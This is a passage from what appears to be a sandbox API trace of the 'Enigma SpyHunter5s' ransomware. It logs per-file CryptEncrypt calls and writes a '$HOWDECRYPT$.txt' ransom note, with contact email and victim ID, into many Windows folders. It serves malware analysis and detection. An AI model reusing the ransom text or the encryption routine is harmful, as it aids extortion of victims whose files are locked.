provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0146.532] WriteFile (in: hFile=0x9c, lpBuffer=0x57ee4f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ef78, lpOverlapped=0x0 | out: lpBuffer=0x57ee4f*, lpNumberOfBytesWritten=0x57ef78*=0x127, lpOverlapped=0x0) returned 1 [0146.533] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0146.533] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ef78, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ef78*=0x2ac, lpOverlapped=0x0) returned 1 [0146.533] CloseHandle (hObject=0x9c) returned 1 [0146.533] GetProcessHeap () returned 0x2c0000 [0146.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x302ffc0 | out: hHeap=0x2c0000) returned 1 [0146.533] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ef18 | out: pbBuffer=0x57ef18) returned 1 [0146.533] GetProcessHeap () returned 0x2c0000 [0146.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0146.533] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ef10*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ef10*=0x30) returned 1 [0146.533] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server\\.." (normalized: "c:\\users\\all users\\microsoft\\drm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.533] GetProcessHeap () returned 0x2c0000 [0146.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0146.534] GetProcessHeap () returned 0x2c0000 [0146.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33e998 | out: hHeap=0x2c0000) returned 1 [0146.534] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ef10 | out: pbBuffer=0x57ef10) returned 1 [0146.534] GetProcessHeap () returned 0x2c0000 [0146.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0146.534] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ef08*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ef08*=0x30) returned 1 [0146.534] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server\\." (normalized: "c:\\users\\all users\\microsoft\\drm\\server\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.534] GetProcessHeap () returned 0x2c0000 [0146.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0146.534] GetProcessHeap () returned 0x2c0000 [0146.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33e8f0 | out: hHeap=0x2c0000) returned 1 [0146.534] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\devicesync\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0146.534] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0146.534] WriteFile (in: hFile=0x9c, lpBuffer=0x57ee43*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ef6c, lpOverlapped=0x0 | out: lpBuffer=0x57ee43*, lpNumberOfBytesWritten=0x57ef6c*=0x127, lpOverlapped=0x0) returned 1 [0146.536] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0146.536] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ef6c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ef6c*=0x2ac, lpOverlapped=0x0) returned 1 [0146.536] CloseHandle (hObject=0x9c) returned 1 [0146.536] GetProcessHeap () returned 0x2c0000 [0146.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x302fef8 | out: hHeap=0x2c0000) returned 1 [0146.537] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\device stage\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0146.537] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0146.537] WriteFile (in: hFile=0x9c, lpBuffer=0x57ee3f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ef68, lpOverlapped=0x0 | out: lpBuffer=0x57ee3f*, lpNumberOfBytesWritten=0x57ef68*=0x127, lpOverlapped=0x0) returned 1 [0146.538] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0146.538] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ef68, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ef68*=0x2ac, lpOverlapped=0x0) returned 1 [0146.538] CloseHandle (hObject=0x9c) returned 1 [0146.538] GetProcessHeap () returned 0x2c0000 [0146.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x302fe30 | out: hHeap=0x2c0000) returned 1 [0146.538] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0146.726] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0146.726] WriteFile (in: hFile=0xb0, lpBuffer=0x57ee3b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ef64, lpOverlapped=0x0 | out: lpBuffer=0x57ee3b*, lpNumberOfBytesWritten=0x57ef64*=0x127, lpOverlapped=0x0) returned 1 [0146.727] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0146.727] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ef64, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ef64*=0x2ac, lpOverlapped=0x0) returned 1 [0146.727] CloseHandle (hObject=0xb0) returned 1 [0146.728] GetProcessHeap () returned 0x2c0000 [0146.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef6ad8 | out: hHeap=0x2c0000) returned 1 [0146.728] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ef00 | out: pbBuffer=0x57ef00) returned 1 [0146.728] GetProcessHeap () returned 0x2c0000 [0146.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0146.728] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eef8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eef8*=0x30) returned 1 [0146.728] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.732] GetProcessHeap () returned 0x2c0000 [0146.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0146.732] GetProcessHeap () returned 0x2c0000 [0146.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffa158 | out: hHeap=0x2c0000) returned 1 [0146.732] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ef00 | out: pbBuffer=0x57ef00) returned 1 [0146.732] GetProcessHeap () returned 0x2c0000 [0146.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0146.732] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eef8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eef8*=0x30) returned 1 [0146.733] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.734] GetProcessHeap () returned 0x2c0000 [0146.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0146.734] GetProcessHeap () returned 0x2c0000 [0146.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff9de0 | out: hHeap=0x2c0000) returned 1 [0146.734] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0146.735] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0146.735] WriteFile (in: hFile=0xb0, lpBuffer=0x57ee2f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ef58, lpOverlapped=0x0 | out: lpBuffer=0x57ee2f*, lpNumberOfBytesWritten=0x57ef58*=0x127, lpOverlapped=0x0) returned 1 [0146.735] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0146.736] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ef58, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ef58*=0x2ac, lpOverlapped=0x0) returned 1 [0146.736] CloseHandle (hObject=0xb0) returned 1 [0146.736] GetProcessHeap () returned 0x2c0000 [0146.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe94d8 | out: hHeap=0x2c0000) returned 1 [0146.736] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eef8 | out: pbBuffer=0x57eef8) returned 1 [0146.736] GetProcessHeap () returned 0x2c0000 [0146.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0146.736] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eef0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eef0*=0x30) returned 1 [0146.736] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.736] GetProcessHeap () returned 0x2c0000 [0146.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0146.736] GetProcessHeap () returned 0x2c0000 [0146.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff9cb8 | out: hHeap=0x2c0000) returned 1 [0146.736] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0146.737] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0146.737] WriteFile (in: hFile=0xb0, lpBuffer=0x57ee27*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ef50, lpOverlapped=0x0 | out: lpBuffer=0x57ee27*, lpNumberOfBytesWritten=0x57ef50*=0x127, lpOverlapped=0x0) returned 1 [0146.738] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0146.738] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ef50, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ef50*=0x2ac, lpOverlapped=0x0) returned 1 [0146.738] CloseHandle (hObject=0xb0) returned 1 [0146.738] GetProcessHeap () returned 0x2c0000 [0146.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff9b90 | out: hHeap=0x2c0000) returned 1 [0146.738] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eef0 | out: pbBuffer=0x57eef0) returned 1 [0146.738] GetProcessHeap () returned 0x2c0000 [0146.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0146.738] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eee8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eee8*=0x30) returned 1 [0146.738] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.738] GetProcessHeap () returned 0x2c0000 [0146.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0146.738] GetProcessHeap () returned 0x2c0000 [0146.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f68e48 | out: hHeap=0x2c0000) returned 1 [0146.739] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eee8 | out: pbBuffer=0x57eee8) returned 1 [0146.739] GetProcessHeap () returned 0x2c0000 [0146.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0146.739] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eee0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eee0*=0x30) returned 1 [0146.739] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.739] GetProcessHeap () returned 0x2c0000 [0146.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0146.739] GetProcessHeap () returned 0x2c0000 [0146.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f68d30 | out: hHeap=0x2c0000) returned 1 [0146.739] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eee8 | out: pbBuffer=0x57eee8) returned 1 [0146.739] GetProcessHeap () returned 0x2c0000 [0146.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0146.739] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eee0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eee0*=0x30) returned 1 [0146.739] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.741] GetProcessHeap () returned 0x2c0000 [0146.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0146.741] GetProcessHeap () returned 0x2c0000 [0146.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f68b00 | out: hHeap=0x2c0000) returned 1 [0146.741] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eee0 | out: pbBuffer=0x57eee0) returned 1 [0146.741] GetProcessHeap () returned 0x2c0000 [0146.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0146.741] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eed8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eed8*=0x30) returned 1 [0146.741] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.741] GetProcessHeap () returned 0x2c0000 [0146.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 